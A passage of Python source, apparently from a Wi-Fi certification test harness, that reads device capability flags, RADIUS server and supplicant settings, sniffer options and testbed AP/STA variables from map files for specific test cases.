    dutInfoObject.__setattr__("SupportedChannelWidth", ReadMapFile(DUTFile, "SupportedChannelWidth", "!"))
    dutInfoObject.__setattr__("Streams", ReadMapFile(DUTFile, "Streams", "!"))
    dutInfoObject.__setattr__("Greenfield", ReadMapFile(DUTFile, "Greenfield", "!"))
    dutInfoObject.__setattr__("SGI20", ReadMapFile(DUTFile, "SGI20", "!"))
    dutInfoObject.__setattr__("SGI40", ReadMapFile(DUTFile, "SGI40", "!"))
    dutInfoObject.__setattr__("RIFS_TX", ReadMapFile(DUTFile, "RIFS_TX", "!"))
    dutInfoObject.__setattr__("Coexistence_2040", ReadMapFile(DUTFile, "Coexistence_2040", "!"))
    dutInfoObject.__setattr__("STBC_RX", ReadMapFile(DUTFile, "STBC_RX", "!"))
    dutInfoObject.__setattr__("STBC_TX", ReadMapFile(DUTFile, "STBC_TX", "!"))
    dutInfoObject.__setattr__("MCS32", ReadMapFile(DUTFile, "MCS32", "!"))
    dutInfoObject.__setattr__("WTSSupport", ReadMapFile(DUTFile, "WTS_ControlAgent_Support", "!"))
    dutInfoObject.__setattr__("WTSTrafficSupport", ReadMapFile(DUTFile, "WTS_TrafficAgent_Support", "!"))
    dutInfoObject.__setattr__("OBSS", ReadMapFile(DUTFile, "OBSS", "!"))
    dutInfoObject.__setattr__("AMPDU_TX", ReadMapFile(DUTFile, "AMPDU_TX", "!"))
    dutInfoObject.__setattr__("AP_Concurrent", ReadMapFile(DUTFile, "AP_Concurrent", "!"))
    dutInfoObject.__setattr__("_11d", ReadMapFile(DUTFile, "11d", "!"))
    dutInfoObject.__setattr__("STAUT_PM", ReadMapFile(DUTFile, "STAUT_PM", "!"))
    dutInfoObject.__setattr__("Open_Mode", ReadMapFile(DUTFile, "Open_Mode", "!"))
    dutInfoObject.__setattr__("Mixedmode_WPA2WPA", ReadMapFile(DUTFile, "Mixedmode_WPA2WPA", "!"))
    dutInfoObject.__setattr__("PMF_OOB", ReadMapFile(DUTFile, "PMF_OOB", "!"))
    #EAP Methods
    dutInfoObject.__setattr__("TLS", ReadMapFile(DUTFile, "TLS", "!"))
    dutInfoObject.__setattr__("TTLS", ReadMapFile(DUTFile, "TTLS", "!"))
    dutInfoObject.__setattr__("PEAP0", ReadMapFile(DUTFile, "PEAP0", "!"))
    dutInfoObject.__setattr__("PEAP1", ReadMapFile(DUTFile, "PEAP1", "!"))
    dutInfoObject.__setattr__("FAST", ReadMapFile(DUTFile, "FAST", "!"))
    dutInfoObject.__setattr__("SIM", ReadMapFile(DUTFile, "SIM", "!"))
    dutInfoObject.__setattr__("AKA", ReadMapFile(DUTFile, "AKA", "!"))
    dutInfoObject.__setattr__("AKA'", ReadMapFile(DUTFile, "AKA'", "!"))
    dutInfoObject.__setattr__("PWD", ReadMapFile(DUTFile, "PWD", "!"))
    #VE Specific
    dutInfoObject.__setattr__("BSS_Trans_Query_Support", ReadMapFile(DUTFile, "BSS_Trans_Query_Support", "!"))
    dutInfoObject.__setattr__("TSM_Support", ReadMapFile(DUTFile, "TSM_Support", "!"))
    #TDLS Specific
    dutInfoObject.__setattr__("TDLSDiscReq", ReadMapFile(DUTFile, "DiscoveryRequest_Support", "!"))
    dutInfoObject.__setattr__("PUSleepSTA", ReadMapFile(DUTFile, "PUAPSDSleepSTA_Support", "!"))
    dutInfoObject.__setattr__("TestCaseID", TestCaseID)
    #Default method is TTLS
    dutInfoObject.__setattr__("DUTEAPMethod", "TTLS")
    #ASD device testing
    dutInfoObject.__setattr__("ASD", ReadMapFile(DUTFile, "ASD", "!"))
    #ASD AC streams support
    dutInfoObject.__setattr__("AC_VO", ReadMapFile(DUTFile, "AC_VO", "!"))
    dutInfoObject.__setattr__("AC_VI", ReadMapFile(DUTFile, "AC_VI", "!"))
    dutInfoObject.__setattr__("AC_BE", ReadMapFile(DUTFile, "AC_BE", "!"))
    dutInfoObject.__setattr__("AC_BK", ReadMapFile(DUTFile, "AC_BK", "!"))
    # First EAP method flagged "1" in DUTInfo.txt wins over the TTLS default
    for EAP in EAPList:
        Ret = ReadMapFile(DUTFile, EAP, "!")
        if int(Ret) == 1:
            dutInfoObject.__setattr__("DUTEAPMethod", EAP)
            break
    # Capability gates: a "TestNA" entry in VarList marks the test skipped
    if TestCaseID == "WPA2-5.8" and dutInfoObject._11h == "0":
        LogMsg("11h not supported by DUT; Skipping the Test.")
        VarList.setdefault("TestNA", "11h not supported by DUT; Skipping the Test.")
    if TestCaseID == "WPA2-5.5.1" and dutInfoObject.PreAuth == "0":
        LogMsg("Pre Authentication not supported by DUT; Skipping the Test.")
        VarList.setdefault("TestNA", "Pre Authentication not supported by DUT; Skipping the Test.")
    if "N-4.2" in TestCaseID or "N-ExA" in TestCaseID:
        VarList.setdefault("APUT_state", "on")
    if "N-5.2" in TestCaseID or "N-ExS" in TestCaseID:
        VarList.setdefault("APUT_state", "off")
    # Build the DUT optional-feature HTML report (uses the HTML module)
    if (ProgName == "P2P" or
        ProgName == "TDLS" or
        ProgName == "PMF" or
        ProgName == "HS2" or
        ProgName == "WFD" or
        ProgName == "WFDS" or
        ProgName == "VHT" or
        ProgName == "HS2-R2" or
        ProgName == "WMMPS" or
        ProgName == "NAN" or
        ProgName == "60GHz" or
        ProgName == "WPS"):
        fFile = open(DUTFeatureInfoFile, "w")
        T = HTML.Table(col_width=['70%', '30%'])
        R1 = HTML.TableRow(cells=['Optional Feature', 'DUT Support'], bgcolor="Gray", header="True")
        T.rows.append(R1)
        if (ProgName == "P2P" or
            ProgName == "TDLS" or
            ProgName == "HS2" or
            ProgName == "WFD" or
            ProgName == "WFDS" or
            ProgName == "HS2-R2" or
            ProgName == "NAN"):
            P2PVarList = ReadAllMapFile(DUTFile, ProgName, "!")
            if P2PVarList != -1:
                P2PVarList = P2PVarList.split('!')
                LogMsg("P2P Supported Features = %s" % P2PVarList)
                for var in P2PVarList:
                    if var != "":
                        v = var.split(',')
                        VarList.setdefault(v[0], v[1])
                        # If the test case names this feature, its value must
                        # match the DUT's declared support
                        featureSupport = find_TestcaseInfo_Level1(TestCaseID, v[0])
                        if featureSupport != "":
                            LogMsg("%s-%s" % (featureSupport, v[1]))
                            if featureSupport != v[1]:
                                LogMsg("DUT does not support the feature")
                                VarList.setdefault("TestNA", "DUT does not support the feature")
                        if v[1] == "0":
                            dis = "No"
                        elif v[1] == "1":
                            dis = "Yes"
                        else:
                            dis = v[1]
                        if "DUT_" not in v[0]:
                            T.rows.append([v[0], dis])
        else:
            ProgVarList = ReadAllMapFile(DUTFile, ProgName, "!")
            if ProgVarList != -1:
                ProgVarList = ProgVarList.split('!')
                LogMsg("%s Supported Features = %s" % (ProgName, ProgVarList))
                # These programs gate the test on a single named feature flag
                checkFeatureFlag = find_TestcaseInfo_Level1(TestCaseID, "checkFeatureFlag")
                LogMsg("checkFeatureFlag = %s" % checkFeatureFlag)
                for var in ProgVarList:
                    if var != "":
                        v = var.split(',')
                        VarList.setdefault(v[0], v[1])
                        featureSupport = find_TestcaseInfo_Level1(TestCaseID, v[0])
                        #LogMsg("Feature Support = %s" % featureSupport)
                        if checkFeatureFlag == v[0]:
                            LogMsg("%s-%s"%(checkFeatureFlag, v[1]))
                            if v[1] != "1":
                                LogMsg("DUT does not support the feature")
                                VarList.setdefault("TestNA", "DUT does not support the feature")
                        if v[1] == "0":
                            dis = "No"
                        elif v[1] == "1":
                            dis = "Yes"
                        else:
                            dis = v[1]
                        if "DUT_" not in v[0]:
                            T.rows.append([v[0], dis])
        htmlcode = str(T)
        fFile.write(htmlcode)
        fFile.write('<p>')
    return 1
def GetCAPIFileNames(TestCaseID):
    """
    Gets the CAPI file name for Testbed Config, DUT Config for given
    testcaseID and load them into the class object of testEnvVariables
    Also resolves the STA config file and, for PMF, the WLAN-Test file.
    Parameters
    ----------
    TestCaseID : str
    Returns
    -------
    Pass(1)/Fail(-1) : int
        always 1
    """
    global ProgName
    setattr(testEnvVariables, "TestbedConfigCAPIFile", find_TestbedFile(TestCaseID))
    # A DUT without a WTS control agent cannot be configured over CAPI in
    # these programs: substitute a "configure manually" prompt file
    if (int(dutInfoObject.WTSSupport) == 0 and
        ProgName != "P2P" and
        ProgName != "HS2" and
        ProgName != "WFD" and
        ProgName != "WFDS" and
        ProgName != "HS2-R2" and
        ProgName != "WMMPS" and
        ProgName != "NAN"):
        setattr(testEnvVariables, "DUTConfigCAPIFile", "NoWTSSupportMsg.txt")
        VarList.setdefault("WTSMsg", "Configure DUT for Testcase = -- %s --" % TestCaseID)
        VarList.setdefault("DUT_WTS_VERSION", "NA")
    else:
        setattr(testEnvVariables, "DUTConfigCAPIFile", find_STAFile(TestCaseID, "DUTFile"))
        VarList.setdefault("WTSMsg", "")
    setattr(testEnvVariables, "STAConfigCAPIFile", find_STAFile(TestCaseID, "STAFile"))
    if ProgName == "PMF":
        setattr(testEnvVariables, "WLANTestCAPIFile", find_WLANTestFile(TestCaseID, "WLanTestFile"))
    return 1
def GetServerSupplicantInfo(TestCaseID):
    """
    Gets the RADIUS Server Information and
    Supplicant name for given test and load them into Env file
    The server is chosen per EAP method ("TLS" vs everything else) and its
    IP/port/shared secret are read from the RADIUSServer map file into the
    global serverInfo object.
    Parameters
    ----------
    TestCaseID : str
    Returns
    -------
    void (serverInfo and VarList are updated in place)
    """
    if dutInfoObject.DUTEAPMethod == "TLS":
        tag = "TLS"
    else:
        tag = "Other"
    serverName = find_Server(TestCaseID, tag)
    VarList.setdefault("RadiusServerName", serverName)
    # DUT supplicant depends on the DUT category; -1 means category unknown
    if dutInfoObject.DUTCategory != -1:
        suppName = find_Supplicant(TestCaseID, "DUT", dutInfoObject.DUTCategory.lower())
        setattr(serverInfo, "Supplicant", suppName)
    # Testbed STAs always use the "c2" category supplicant
    staSuppName = find_Supplicant(TestCaseID, "STA", "c2")
    setattr(serverInfo, "STASupplicant", staSuppName)
    setattr(serverInfo, "name", serverName)
    setattr(serverInfo, "IP", ReadMapFile(uccPath+RADIUSServer, "%s%s"%(serverName, "IPAddress"), "!"))
    setattr(serverInfo, "Port", ReadMapFile(uccPath+RADIUSServer, "%s%s"%(serverName, "Port"), "!"))
    setattr(serverInfo, "Password", ReadMapFile(uccPath+RADIUSServer, "%s%s"%(serverName, "SharedSecret"), "!"))
    LogMsg(serverInfo)
def GetSnifferInfo(TestCaseID):
    """
    Selects the sniffer start/stop CAPI scripts based on the init file's
    "sniffer_enable" flag, and names the capture file after the test case.
    Parameters
    ----------
    TestCaseID : str
    Returns
    -------
    void (VarList is updated in place)
    """
    enabled = (ReadMapFile(uccPath+InitFile, "sniffer_enable", "!") == '1')
    VarList.setdefault("SnifferFileName", "%s_%s" % ("SnifferTrace", TestCaseID))
    if enabled:
        start, stop = "Sniffer-Start.txt", "Sniffer-Stop.txt"
    else:
        # Disabled: both hooks point at the no-op script
        start, stop = "Sniffer-Disable.txt", "Sniffer-Disable.txt"
    VarList.setdefault("StartSniffer", start)
    VarList.setdefault("StopSniffer", stop)
def GetTestbedDeviceInfo(TestCaseID):
    """
    Reads the TestbedDevice Info(Name of TestbedAPs,STAs) for given
    testcaseID and loads them into the class object of testEnvVariables
    Also derives per-device variables (control agents, MAC address
    placeholders, wireless IPs) and the test SSID(s). In qualification mode
    the AP/STA lists come from QualAP/QualSTA instead of MasterTestInfo.
    Parameters
    ----------
    TestCaseID : str
    Returns
    -------
    Pass(1)/Fail(-1) : int
        always 1
    """
    global ProgName, qual, QualAP, QualSTA
    iCount = 1
    LogMsg("Read Testbed Device Info Function")
    # Searching Band
    FindBandChannel(TestCaseID)
    # Searching APs
    APs = find_TestcaseInfo_Level1(TestCaseID, "AP").split(",")
    if qual:
        APs = QualAP.split(",")
        LogMsg("Qualification Mode - APs-[%s]" % APs)
    for AP in APs:
        if AP == "":
            continue
        AddTestCaseAP(AP, iCount)
        # MAC-address placeholders are band-specific: channel > 35 means 5 GHz
        if ProgName == "60GHz":
            VarList.setdefault("bssid", ("$%sAPMACAddress_60G"%AP))
            VarList.setdefault(("AP%sMACAddress"%iCount), ("$%sAPMACAddress_60G"%AP))
            VarList.setdefault("AP%s_wireless_ip"%iCount, ReadMapFile(uccPath+InitFile, "%s_ap_wireless_ip"%AP.lower(), "!"))
        elif int(testEnvVariables.Channel) > 35 :
            VarList.setdefault("bssid", ("$%sAPMACAddress_5G" % AP))
            VarList.setdefault(("AP%sMACAddress"%iCount), ("$%sAPMACAddress_5G" % AP))
            VarList.setdefault(("AP%sMACAddress2"%iCount), ("$%sAPMACAddress2_5G" % AP))
            VarList.setdefault(("AP%sMACAddress3"%iCount), ("$%sAPMACAddress3_5G" % AP))
        else:
            VarList.setdefault("bssid", ("$%sAPMACAddress_24G" % AP))
            VarList.setdefault(("AP%sMACAddress"%iCount), ("$%sAPMACAddress_24G" % AP))
            VarList.setdefault(("AP%sMACAddress2"%iCount), ("$%sAPMACAddress2_24G" % AP))
            VarList.setdefault(("AP%sMACAddress3"%iCount), ("$%sAPMACAddress3_24G" % AP))
        VarList.setdefault("AP%s_control_agent" %(iCount), "wfa_control_agent_%s_ap" % (AP.lower()))
        iCount = iCount+1
    # Unused testbed APs still get sequential numbers after the active ones
    for p in testEnvVariables.APs:
        if testEnvVariables.APs[p].Number == 0:
            testEnvVariables.APs[p].Number = iCount
            iCount = iCount+1
        LogMsg(testEnvVariables.APs[p])
    iCount = 1
    # Searching STAs
    STAs = find_TestcaseInfo_Level1(TestCaseID, "STA").split(",")
    if qual:
        STAs = QualSTA.split(",")
        LogMsg("Qualification Mode - STAs-[%s]" % STAs)
    for STA in STAs:
        setattr(testEnvVariables, "TSTA%s" % (iCount), STA)
        VarList.setdefault("STA%s_control_agent" % (iCount), "wfa_control_agent_%s_sta" % (STA.lower()))
        VarList.setdefault("STA%s_wireless_ip" % iCount, ReadMapFile(uccPath+InitFile, "%s_sta_wireless_ip" % STA.lower(), "!"))
        if ProgName == "TDLS":
            VarList.setdefault("STA%s_wireless_ip2" % iCount, ReadMapFile(uccPath+InitFile, "%s_sta_wireless_ip2" % STA.lower(), "!"))
            VarList.setdefault("STA%s_wireless_ip3" % iCount, ReadMapFile(uccPath+InitFile, "%s_sta_wireless_ip3" % STA.lower(), "!"))
        if ProgName == "HS2-R2":
            VarList.setdefault("STA%s_wireless_ipv6" % iCount, ReadMapFile(uccPath+InitFile, "%s_sta_wireless_ipv6" % STA.lower(), "!"))
        VarList.setdefault("STA%s_MACAddress" % iCount, ("$%sSTAMACAddress"%STA))
        iCount = iCount+1
    # Searching SSID; multi-SSID tests get SSID_1..SSID_n as well
    iCount = 1
    setattr(testEnvVariables, "SSID", find_TestcaseInfo_Level1(TestCaseID, "SSID"))
    setattr(testEnvVariables, "SSID_1", find_TestcaseInfo_Level1(TestCaseID, "SSID"))
    SSIDs = find_TestcaseInfo_Level1(TestCaseID, "SSID").split(" ")
    for SSID in SSIDs:
        if len(SSIDs) > 1:
            setattr(testEnvVariables, "SSID_%s"%(iCount), SSID)
            iCount = iCount + 1
    # NOTE(review): FindBandChannel already ran at the top of this function;
    # this second call looks redundant for non-P2P programs - confirm
    if ProgName != "P2P" and ProgName != "WFD" and ProgName != "WFDS" and ProgName != "NAN":
        FindBandChannel(TestCaseID)
    return 1
def GetSubscriptionServerInfo(TestCaseID):
    """
    Resolves the HS2-R2 subscription (OSU) server for the given test case
    and registers its name and control agent in VarList.
    The server is chosen per EAP method ("TLS" vs everything else), like
    GetServerSupplicantInfo().
    Parameters
    ----------
    TestCaseID : str
    Returns
    -------
    Pass(1)/Fail(-1) : int
        always 1
    """
    global ProgName
    iCount = 1
    LogMsg("Read Testbed Subscription Server Info Function")
    if dutInfoObject.DUTEAPMethod == "TLS":
        tag = "TLS"
    else:
        tag = "Other"
    subsServerName = find_SubsServer(TestCaseID, tag)
    setattr(testEnvVariables, "SS%s" % (iCount), subsServerName)
    VarList.setdefault("SS%s_control_agent" %(iCount), "wfa_control_agent_%s_osu" % (subsServerName.lower()))
    VarList.setdefault("SS%s" % (iCount), "%s" % (subsServerName.lower()))
    return 1
def ReadMapFile(filename, index, delim):
    """
    Reads a MapFile of format
    Param1<delim>value1<delim>Param2<delim>value2<delim>
    and returns the token immediately following the first occurrence of
    *index*. Text after '#' on a line is treated as a comment.
    Parameters
    ----------
    filename : str
    index : str
        key token to look up (exact match after splitting on *delim*)
    delim : str
    Returns
    -------
    Value/Fail(-1) : str/int
        -1 when the file is missing or the key is absent. If *index* is
        the last token on its line an IndexError propagates (legacy
        behavior, preserved).
    """
    returnString = -1
    if os.path.exists(filename) == 0:
        LogMsg("File not found - %s" % filename)
        return -1
    LogMsg("ReadMapFile ------- %s-%s-%s" % (filename, index, delim))
    # FIX: context manager guarantees the handle is closed even on error;
    # also dropped the dead "if not l: break" (readlines never yields a
    # falsy line) and the unused iCount counter.
    with open(filename, 'r') as fileP:
        for l in fileP.readlines():
            line = l.split('#')
            command = line[0].split(delim)
            if index in command:
                returnString = command[command.index(index)+1]
                break
    return returnString
def ReadAllMapFile(filename, index, delim):
    """
    Reads every mapping line of a MapFile of format
    Param1<delim>value1<delim> and returns them concatenated as
    "Param1,value1<delim>Param2,value2<delim>...".
    Text after '#' on a line is ignored; *index* is only echoed in the log.
    Parameters
    ----------
    filename : str
    index : str
        not used for filtering, logged only
    delim : str
    Returns
    -------
    Value/Fail(-1) : str/int
        -1 when the file is missing or no line contains *delim*
    """
    if os.path.exists(filename) == 0:
        LogMsg("File not found - %s" % filename)
        return -1
    LogMsg("Read All MapFile ------- %s-%s-%s" % (filename, index, delim))
    # FIX: context manager + list/join accumulation; removed the dead
    # "if not l: break" and the unused iCount of the original.
    entries = []
    with open(filename, 'r') as fileP:
        for l in fileP.readlines():
            line = l.split('#')
            if delim in line[0]:
                command = line[0].split(delim)
                entries.append("%s,%s%s" % (command[0], command[1], delim))
    # Preserve the legacy contract: -1 (not "") when nothing matched
    return "".join(entries) if entries else -1
def GetAPPortNumber(APName):
    """
    Gets the power switch port number for given AP
    Looked up as "<APName>APPowerSwitchPort" in the testbed-AP map file.
    Parameters
    ----------
    APName : str
    Returns
    -------
    Port Number/Fail(-1) : str
    """
    return ReadMapFile(uccPath+TestbedAPFile, "%s%s" % (APName, "APPowerSwitchPort"), "!")
def GetAPIPAddress(APName):
    """
    Gets the IP Address of given AP
    Looked up as "<APName>APIPAddress" in the testbed-AP map file; only the
    first space-separated token of the entry is returned.
    Parameters
    ----------
    APName : str
    Returns
    -------
    IP Address/Fail(-1) : str/int
    """
    # FIX: the original called ReadMapFile twice (re-reading and re-logging
    # the map file); one lookup is sufficient and behaviorally identical.
    entry = ReadMapFile(uccPath+TestbedAPFile, "%s%s" % (APName, "APIPAddress"), "!")
    if entry != -1:
        return entry.split(' ')[0]
    return -1
def AddTestCaseAP(APName, pos):
    """
    Marks testbed AP *APName* as active for the current test: assigns its
    slot number and sets its power state to "On".
    Parameters
    ----------
    APName : str
        must be a key of testEnvVariables.APs
    pos : int
        position in list
    Returns
    -------
    Pass(1)/Fail(-1) : int
    """
    try:
        # FIX: catch only the dict-lookup failure; the old bare 'except'
        # also swallowed KeyboardInterrupt/SystemExit and unrelated bugs.
        ap = testEnvVariables.APs[APName]
    except KeyError:
        LogMsg("Invalid AP Name")
        return -1
    setattr(ap, "Number", pos)
    setattr(ap, "State", "On")
    return 1
def GetOtherVariables(TID):
    """
    Collects the remaining per-test variables into VarList: throughput
    thresholds, channel width, PMF/security settings, MIMO capability
    values, conditional-step script names and common defaults.
    Parameters
    ----------
    TID : str
        test case ID
    Returns
    -------
    void (VarList is updated in place)
    """
    global dutInfoObject
    # String comparison: ASD is read from DUTInfo.txt as a string, so
    # > "0" selects any non-zero ASD flag
    if getattr(dutInfoObject, "ASD") > "0":
        find_ASD_threshold_values(TID, "Throughputs_ASD")
    else:
        find_throughput_values(TID, "Throughputs")
    cw = find_TestcaseInfo_Level1(TID, "APChannelWidth")
    LogMsg("Channel Width = %s" % cw)
    if cw != "":
        VarList.setdefault("APChannelWidth", cw)
    if ProgName == "PMF":
        #Security get parameters
        findSecurity(TID, "Security")
        #PMF Capability get parameters
        findPMFCap(TID, "PMFCapability")
        # PMF-4.x tests inject from the STA side, PMF-5.x from the AP side
        if "PMF-4" in TID:
            VarList.setdefault("sender", "sta")
        if "PMF-5" in TID:
            VarList.setdefault("sender", "ap")
        #WLAN Tester for frame injection-sniffing
        cond = find_TestcaseInfo_Level1(TID, "WFA_Tester")
        VarList.setdefault("WFA_Tester", cond)
        VarList.setdefault("TBAPConfigServer", "TestbedAPConfigServer")
        VarList.setdefault("WFA_Sniffer", "wfa_sniffer")
        VarList.setdefault("WFA_TEST_control_agent", "wfa_test_control_agent")
    combo = find_TestcaseInfo_Level1(TID, "QualCombinationInfo")
    LogMsg("Combination Info = %s" % combo)
    if combo != "":
        VarList.setdefault("QualCombinationInfo", combo)
    # MIMO Related Checks
    VarList.setdefault("ChannelWidth_Value", dutInfoObject.SupportedChannelWidth)
    VarList.setdefault("GreenField_Value", dutInfoObject.Greenfield)
    VarList.setdefault("SGI20_Value", dutInfoObject.SGI20)
    VarList.setdefault("SGI40_Value", dutInfoObject.SGI40)
    VarList.setdefault("MCS_Set_Value", dutInfoObject.Streams)
    VarList.setdefault("MCS32_Value", dutInfoObject.MCS32)
    VarList.setdefault("STBC_RX_Value", dutInfoObject.STBC_RX)
    VarList.setdefault("STBC_TX_Value", dutInfoObject.STBC_TX)
    VarList.setdefault("STAUT_PM", dutInfoObject.STAUT_PM)
    VarList.setdefault("BSS_Trans_Query_Support", dutInfoObject.BSS_Trans_Query_Support)
    VarList.setdefault("TSM_Support", dutInfoObject.TSM_Support)
    VarList.setdefault("Streams", "%sSS" % dutInfoObject.Streams)
    VarList.setdefault("Open_Mode", dutInfoObject.Open_Mode)
    VarList.setdefault("Mixedmode_WPA2WPA", dutInfoObject.Mixedmode_WPA2WPA)
    VarList.setdefault("PMF_OOB", dutInfoObject.PMF_OOB)
    VarList.setdefault("ASD", dutInfoObject.ASD)
    VarList.setdefault("AC_VO", dutInfoObject.AC_VO)
    VarList.setdefault("AC_VI", dutInfoObject.AC_VI)
    VarList.setdefault("AC_BE", dutInfoObject.AC_BE)
    VarList.setdefault("AC_BK", dutInfoObject.AC_BK)
    if ProgName == "N":
        VarList.setdefault("WTS_ControlAgent_Support", dutInfoObject.WTSSupport)
        VarList.setdefault("WTS_TrafficAgent_Support", dutInfoObject.WTSTrafficSupport)
        #Check for 11n Optional Test Cases Flag
        FindCheckFlag11n(TID)
    # Conditional steps resolve to a CAPI script when the DUT supports the
    # feature, otherwise to the no-op script DoNothing.txt
    #TDLS specific conditional step
    cond = find_TestcaseInfo_Level1(TID, "ConditionalStep-DiscReq")
    if cond != "":
        if dutInfoObject.TDLSDiscReq == "1":
            VarList.setdefault("ConditionalStep-DiscReq", cond)
        else:
            VarList.setdefault("ConditionalStep-DiscReq", "DoNothing.txt")
    cond = find_TestcaseInfo_Level1(TID, "ConditionalStep-PUSleep")
    if cond != "":
        if dutInfoObject.PUSleepSTA == "1":
            VarList.setdefault("ConditionalStep-PUSleep", cond)
        else:
            VarList.setdefault("ConditionalStep-PUSleep", "DoNothing.txt")
    #Check for conditional step
    cond = find_TestcaseInfo_Level1(TID, "ConditionalStep-Aonly-40")
    if cond != "":
        if re.search('A', dutInfoObject.DUTBand) and dutInfoObject.SupportedChannelWidth == "40":
            VarList.setdefault("ConditionalStep-Aonly-40", cond)
        else:
            VarList.setdefault("ConditionalStep-Aonly-40", "DoNothing.txt")
    cond = find_TestcaseInfo_Level1(TID, "ConditionalStep-2SS")
    if cond != "":
        if dutInfoObject.Streams == "3" or dutInfoObject.Streams == "2":
            VarList.setdefault("ConditionalStep-2SS", cond)
        else:
            VarList.setdefault("ConditionalStep-2SS", "DoNothing.txt")
    cond = find_TestcaseInfo_Level1(TID, "ConditionalStep-3SS")
    if cond != "":
        if dutInfoObject.Streams == "3":
            VarList.setdefault("ConditionalStep-3SS", cond)
        else:
            VarList.setdefault("ConditionalStep-3SS", "DoNothing.txt")
    #Check for Special Stream
    cond = find_TestcaseInfo_Level1(TID, "TX-SS")
    if cond != "":
        VarList.setdefault("TX-SS", cond)
    #Check for Special Stream
    cond = find_TestcaseInfo_Level1(TID, "RX-SS")
    if cond != "":
        VarList.setdefault("RX-SS", cond)
    AddVariableInit(TID, "STA_Frag", "2346")
    AddVariableInit(TID, "STA_Legacy_PS", "off")
    AddVariableInit(TID, "STA2_Legacy_PS", "off")
    AddVariableInit(TID, "HTFlag", "on")
    AddVariableInit(TID, "WMMFlag", "off")
    AddVariableInit(TID, "CheckFlag11n", "off")
    #TDLS specific
    AddVariableInit(TID, "CheckFlag11n", "off")
    AddVariableInit(TID, "Offch", "44")
    AddVariableInit(TID, "Offchwidth", "20")
    VarList.setdefault("DUTSupportedCW", dutInfoObject.SupportedChannelWidth)
    find_stream_threshold_values(TID, "WMMStreamThreshold")
def AddVariableInit(TID, VarName, VarDefault):
    """Seed VarList[VarName] from the master test info for *TID*, falling
    back to *VarDefault* when the test case does not define it."""
    found = find_TestcaseInfo_Level1(TID, VarName)
    VarList.setdefault(VarName, found if found != "" else VarDefault)
def FindCheckFlag11n(TestCaseID):
    """
    Finds the 11n optional test case flags and decides whether
    test case should be executed or not
    A missing flag means no check is needed; a "0" DUT value marks the test
    not-applicable via VarList["TestNA"]. If the flag names an EAP method,
    that method also becomes the DUT's EAP method.
    Parameters
    ----------
    TestCaseID : str
    Returns
    -------
    void (despite the historical Pass/Fail doc, nothing is returned)
    """
    global dutInfoObject
    chkFlag = find_TestcaseInfo_Level1(TestCaseID, "CheckFlag11n")
    LogMsg("%s is check flag" % chkFlag)
    if chkFlag == "":
        LogMsg("Options Check for 11n not required for test case %s" % TestCaseID)
    elif getattr(dutInfoObject, chkFlag) == "0":
        LogMsg("%s not supported by DUT; Skipping the Test." % chkFlag)
        VarList.setdefault("TestNA", "%s not supported by DUT; Skipping the Test. Re-Check the file \"DUTInfo.txt\"" % chkFlag)
    else:
        LogMsg("%s is supported by DUT; Make sure [%s] is enabled" % (chkFlag, chkFlag))
        for EAP in EAPList:
            if EAP == chkFlag:
                dutInfoObject.__setattr__("DUTEAPMethod", EAP)
                VarList.setdefault("DUTEAPMethod", dutInfoObject.DUTEAPMethod)
                LogMsg("%s EAP method is supported by DUT" % chkFlag)
                break
def AddWPSConfigMethod(TID, VarName, VarValue):
    """
    Registers the DUT's WPS config method in VarList under *VarName*.
    If the requested method *VarValue* is not flagged "1" in DUTInfo.txt,
    the first supported method from WPSConfigList is substituted; when none
    is supported, the original (unsupported) value is kept as-is.
    Parameters
    ----------
    TID : str
        test case ID (unused here, kept for interface symmetry)
    VarName : str
    VarValue : str
        preferred WPS method name, e.g. "WPS_Keypad"
    """
    DUTFile = uccPath+DUTInfoFile
    dut_wps_support = ReadMapFile(DUTFile, VarValue, "!")
    if int(dut_wps_support) != 1:
        for m in WPSConfigList:
            if int(ReadMapFile(DUTFile, m, "!")) == 1:
                VarValue = m
                break
    VarList.setdefault(VarName, VarValue)
# For P2P Parameters
def GetP2PVariables(TID):
    """
    Loads P2P-family variables for the test case into VarList: operating /
    listen channels, GO intent values, WFDS service preference, persistence
    and service-discovery flags, and the DUT's WPS config method.
    WFD resolves its operating channel per band via FindBandOperChannel();
    the other programs take it directly from the master test info.
    Parameters
    ----------
    TID : str
        test case ID
    Returns
    -------
    void (VarList is updated in place)
    """
    global ProgName
    oper_chn = -1
    list_chn = -1
    intent_val = -1
    serv_pref = -1
    if ProgName == "WFD":
        FindBandOperChannel(TID)
    else:
        oper_chn = find_TestcaseInfo_Level1(TID, "OperatingChannel")
        if oper_chn != "":
            VarList.setdefault("OPER_CHN", oper_chn)
        if ProgName == "WFDS":
            serv_pref = find_TestcaseInfo_Level1(TID, "ServicePref")
            if serv_pref != "":
                VarList.setdefault("WfdsTestServicePref", serv_pref)
    list_chn = find_TestcaseInfo_Level1(TID, "ListenChannel")
    if list_chn != "":
        VarList.setdefault("LISTEN_CHN", list_chn)
    intent_val = find_TestcaseInfo_Level1(TID, "IntentValue_DUT")
    if intent_val != "":
        VarList.setdefault("INTENT_VAL_DUT", intent_val)
    intent_val = find_TestcaseInfo_Level1(TID, "IntentValue_STA")
    if intent_val != "":
        VarList.setdefault("INTENT_VAL_STA", intent_val)
    AddVariableInit(TID, "PERSISTENT", 0)
    AddVariableInit(TID, "SERDISC", 0)
    wps_method = find_TestcaseInfo_Level1(TID, "WPS_Config")
    if wps_method != "":
        AddWPSConfigMethod(TID, "DUT_WPS_METHOD", wps_method)
def FindBandOperChannel(TestCaseID):
    """
    Finds the band and operating channel(s) required for given test case
    and puts them into testEnvVariables / VarList.
    Channels are listed as "5G/2.4G" pairs separated by commas; the 2.4 GHz
    half is used unless the resolved band is 11a/11na. Multi-channel tests
    get OPER_CHN_1..n plus OPER_CHN set to the first channel.
    Parameters
    ----------
    TestCaseID : str
    Returns
    -------
    testOperChannel : list of str (None when the test defines no channel)
    """
    global ProgName
    LoadBandSelection()
    band = -1
    parsedChannels = []
    testOperChannel = []
    Band = find_TestcaseInfo_Level1(TestCaseID, "Band")
    # Normalize the slash-separated band spellings used in MasterTestInfo
    aliases = {"A/G": "AG", "A/G/N": "AGN", "G/N": "GN", "A/N": "AN", "A/B": "AB"}
    Band = aliases.get(Band, Band)
    try:
        band = bandSelectionList["%s:%s" % (Band, dutInfoObject.DUTBand)]
    except KeyError:
        LogMsg("Invalid band information %s" % Band)
    rawChannels = find_TestcaseInfo_Level1(TestCaseID, "OperatingChannel").split(",")
    if rawChannels[0] == "":
        return
    for chan in range(0, len(rawChannels)):
        parsedChannels.append(rawChannels[chan].split("/"))
